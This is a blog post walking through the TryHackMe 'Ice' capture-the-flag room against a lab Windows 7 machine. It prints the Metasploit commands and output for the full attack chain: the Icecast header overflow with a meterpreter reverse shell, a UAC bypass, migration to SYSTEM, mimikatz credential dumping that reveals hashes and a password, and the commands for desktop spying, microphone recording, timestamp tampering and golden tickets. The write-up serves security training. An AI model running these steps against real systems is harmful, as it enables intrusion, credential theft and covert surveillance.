DEV Community

Omri Bornstein
Omri Bornstein

Posted on • Updated on • Originally published at applegamer22.hashnode.dev

TryHackMe Ice

TryHackMe Ice

Recon

Launch a scan against our target machine

$ sudo nmap -sS -sV <MACHINE_IP>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 19:23 AEST
Nmap scan report for <MACHINE_IP>
Host is up (0.32s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http         Icecast streaming media server
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.04 seconds
Enter fullscreen mode Exit fullscreen mode

What port is Microsoft Remote Desktop open on?

Answer: 3389

What service did nmap identify as running on port 8000?

Answer: Icecast

What does Nmap identify as the hostname of the machine?

Answer: DARK-PC

Gain Access

What type of vulnerability is it (according to https://www.cvedetails.com)?

Answer: Execute Code Overflow

What is the CVE number for this vulnerability?

Answer: CVE-2004-1561

What is the full path (starting with exploit) for the Metasploit exploitation module?

msf6 > search icecast

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
Enter fullscreen mode Exit fullscreen mode

Answer: exploit/windows/http/icecast_header

What is the only required setting which currently is blank?

msf6 exploit(windows/http/icecast_header) > show options

Module options (exploit/windows/http/icecast_header):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   8000             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
Enter fullscreen mode Exit fullscreen mode

Answer: RHOSTS

Escalate

What's the name of the shell we have now?

msf6 exploit(windows/http/icecast_header) > set RHOSTS <MACHINE_IP>
RHOSTS => <MACHINE_IP>
msf6 exploit(windows/http/icecast_header) > set LHOST tun0
LHOST => <OPENVPN_IP>
msf6 exploit(windows/http/icecast_header) > exploit 

[*] Started reverse TCP handler on <OPENVPN_IP>:4444 
[*] Sending stage (175174 bytes) to <MACHINE_IP>
[*] Meterpreter session 1 opened (<OPENVPN_IP>:4444 -> <MACHINE_IP>:49197) at 2021-04-20 19:39:24 +1000

meterpreter > sysinfo
Enter fullscreen mode Exit fullscreen mode

Answer: meterpreter

What user was running that Icecast process?

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User          Path
 ---   ----  ----                  ----  -------  ----          ----
 0     0     [System Process]
 4     0     System
 144   2676  WinSAT.exe            x64   1
 416   4     smss.exe
 500   692   svchost.exe
 544   536   csrss.exe
 588   692   svchost.exe
 592   536   wininit.exe
 604   584   csrss.exe
 652   584   winlogon.exe
 692   592   services.exe
 700   592   lsass.exe
 708   592   lsm.exe
 816   692   svchost.exe
 884   692   svchost.exe
 932   692   svchost.exe
 1008  816   WmiPrvSE.exe
 1016  692   svchost.exe
 1020  692   vds.exe
 1052  692   svchost.exe
 1188  692   svchost.exe
 1292  692   sppsvc.exe
 1300  500   dwm.exe               x64   1        Dark-PC\Dark  C:\Windows\System32\dwm.exe
 1316  1288  explorer.exe          x64   1        Dark-PC\Dark  C:\Windows\explorer.exe
 1368  692   spoolsv.exe
 1396  692   svchost.exe
 1452  692   taskhost.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\taskhost.exe
 1564  692   amazon-ssm-agent.exe
 1640  692   LiteAgent.exe
 1680  692   svchost.exe
 1820  692   Ec2Config.exe
 2036  500   Defrag.exe
 2060  692   svchost.exe
 2280  1316  Icecast2.exe          x86   1        Dark-PC\Dark  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2472  544   conhost.exe
 2480  692   TrustedInstaller.exe
 2576  692   SearchIndexer.exe
 2640  604   conhost.exe           x64   1
 2676  692   taskhost.exe          x64   1
 2716  816   rundll32.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\rundll32.exe
 2744  2716  dinotify.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\dinotify.exe
Enter fullscreen mode Exit fullscreen mode

Answer: Dark

What build of Windows is the system?

meterpreter > sysinfo 
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
Enter fullscreen mode Exit fullscreen mode

Answer: 7601

What is the architecture of the process we're running?

Answer: x64

What is the full path for the first returned exploit from the local exploit suggester?

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.170.20 - Collecting local exploits for x86/windows...
[*] 10.10.170.20 - 37 exploit checks are being tried...
[+] 10.10.170.20 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.170.20 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
Enter fullscreen mode Exit fullscreen mode

Answer: exploit/windows/local/bypassuac_eventvwr

What is the name of the incorrect option for exploit/windows/local/bypassuac_eventvwr?

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > show options 

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86
Enter fullscreen mode Exit fullscreen mode

Answer: LHOST

What permission listed by getprivs allows us to take ownership of files?

msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST tun0
LHOST => <OPENVPN_IP>
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on <OPENVPN_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.170.20
[*] Meterpreter session 2 opened (<OPENVPN_IP>:4444 -> 10.10.170.20:49215) at 2021-04-20 19:54:34 +1000
[*] Cleaning up registry keys ...

meterpreter > sessions 
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions -i 2
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Enter fullscreen mode Exit fullscreen mode

Answer: SeTakeOwnershipPrivilege

Looting

What's the name of the printer spool service?

meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 1368  692   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe

Enter fullscreen mode Exit fullscreen mode

Answer: spoolsv.exe

What user is listed by getuid?

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1432 to 1368...
[*] Migration completed successfully.
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
Enter fullscreen mode Exit fullscreen mode

Answer: NT AUTHORITY\SYSTEM

Which kiwi command allows up to retrieve all credentials?

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1432 to 1368...
[*] Migration completed successfully.
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
Enter fullscreen mode Exit fullscreen mode

Answer: creds_all

What is Dark's password?

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
-------------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
-------------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
-------------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)
Enter fullscreen mode Exit fullscreen mode

Answer: Password01!

What command allows us to dump all of the password hashes stored on the system?

meterpreter > help
Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database
Enter fullscreen mode Exit fullscreen mode

Post-Exploitation

Answer: hashdump

what command allows us to watch the remote user's desktop in real time?

meterpreter > help
Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    screenshare    Watch the remote user desktop in real time
Enter fullscreen mode Exit fullscreen mode

Answer: screenshare

How about if we wanted to record from a microphone attached to the system?

meterpreter > help
Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
Enter fullscreen mode Exit fullscreen mode

Answer: record_mic

What command allows us to modify timestamps of files on the system?

meterpreter > help
Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes
Enter fullscreen mode Exit fullscreen mode

Answer: timestomp

What command allows us to get a "golden ticket"?

meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    golden_ticket_create   Create a golden kerberos ticket
Enter fullscreen mode Exit fullscreen mode

Answer: golden_ticket_create

Discussion (0)